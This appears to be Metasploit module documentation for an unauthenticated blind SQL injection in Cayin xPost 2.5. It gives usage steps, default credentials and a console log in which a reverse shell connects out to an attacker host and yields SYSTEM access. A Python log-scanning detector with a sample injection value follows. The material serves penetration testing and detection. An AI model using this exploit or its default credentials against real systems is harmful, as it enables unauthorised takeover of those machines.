## Vulnerable Application

This module exploits an unauthenticated SQL injection in Cayin xPost <= 2.5. The `wayfinder_seqid` parameter of the `wayfinder_meeting_input.jsp` file is vulnerable to blind SQL injection. Because the application bundles its own MySQL and Apache Tomcat, the environment is fairly static, so the module's default settings should work. Successful exploitation results in SYSTEM-level access.

Only the `java/jsp_shell_reverse_tcp` and `java/jsp_shell_bind_tcp` payloads appear to be valid.

The default credentials for the system are `administrator:admin` (see the [Guide](http://onlinehelp.cayintech.com/xPost/PDF/MAXP20EN110504-l.pdf), page 16).

## Verification Steps

1. Install the application and start it
2. Start msfconsole
3. Do: `use exploit/windows/http/cayin_xpost_sql_rce`
4. Do: `set rhosts [ip]`
5. Do: `run`
6. You should get a shell.

## Options

### LOCALWEBROOT

Path to the `webapps` folder for Cayin. Defaults to `C:/CayinApps/webapps/`.

## Scenarios

### Cayin xPost 2.5 on Windows 10.0.16299.125

```
[*] Processing xpost.rb for ERB directives.
resource (xpost.rb)> use exploit/windows/http/cayin_xpost_sql_rce
resource (xpost.rb)> set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
resource (xpost.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (xpost.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (xpost.rb)> set verbose true
verbose => true
resource (xpost.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Utilizing payload filename cY0bWf1Rh6C9.jsp
[*] Payload Size: 1499
[*] Payload Size Encoded: 2998
[*] Attempting Exploitation
[*] Triggering uploaded payload
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:50158) at 2020-06-09 12:20:33 -0400
[!] Tried to delete C:/CayinApps/webapps/cY0bWf1Rh6C9.jsp, unknown result

C:\CayinApps\Tomcat>
C:\CayinApps\Tomcat>whoami
whoami
nt authority\system

C:\CayinApps\Tomcat>ver
ver
Microsoft Windows [Version 10.0.16299.125]

C:\CayinApps\Tomcat>
```
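As an added detection example (not part of the module or its documentation): a small Python checker that scans Tomcat access-log lines for requests to `wayfinder_meeting_input.jsp` whose `wayfinder_seqid` value is not a plain integer, which is the shape of request the injection described above produces. The access-log format, the assumption that legitimate sequence ids are integers, and the sample log lines are all assumptions constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed Tomcat AccessLogValve "common" layout: %h %l %u %t "%r" %s %b
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

VULN_PAGE = "wayfinder_meeting_input.jsp"   # from the module description
VULN_PARAM = "wayfinder_seqid"              # injected parameter


def suspicious_seqid(target):
    """Return the decoded wayfinder_seqid value when the request hits the
    vulnerable JSP with a value that is not a plain integer, else None.
    Assumption (not stated on the page): legitimate seqids are integers."""
    parts = urlsplit(target)
    if parts.path.rsplit("/", 1)[-1].lower() != VULN_PAGE:
        return None
    # parse_qs percent-decodes the values once, so encoded quotes show up as-is
    for value in parse_qs(parts.query).get(VULN_PARAM, []):
        decoded = value.strip()
        if not decoded.isdigit():
            return decoded
    return None


def scan_access_log(lines):
    """Return (client_ip, timestamp, decoded_value) for each suspicious request."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue   # skip lines that do not match the assumed layout
        bad = suspicious_seqid(m.group("target"))
        if bad is not None:
            hits.append((m.group("ip"), m.group("ts"), bad))
    return hits


# Constructed sample log lines (not captured from a real system)
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Jun/2020:12:19:01 -0400] "GET /xPost/wayfinder_meeting_input.jsp?wayfinder_seqid=5 HTTP/1.1" 200 812',
    '10.0.0.9 - - [09/Jun/2020:12:20:30 -0400] "GET /xPost/wayfinder_meeting_input.jsp?wayfinder_seqid=1%27-- HTTP/1.1" 200 812',
    '10.0.0.5 - - [09/Jun/2020:12:21:02 -0400] "GET /xPost/index.jsp?wayfinder_seqid=1%27-- HTTP/1.1" 200 412',
]

if __name__ == "__main__":
    for ip, ts, value in scan_access_log(SAMPLE_LOG):
        print(f"{ts} {ip} non-numeric {VULN_PARAM}: {value!r}")
```

The first and third sample lines are benign (an integer id, and the suspicious value sent to an unrelated page), so only the second is reported.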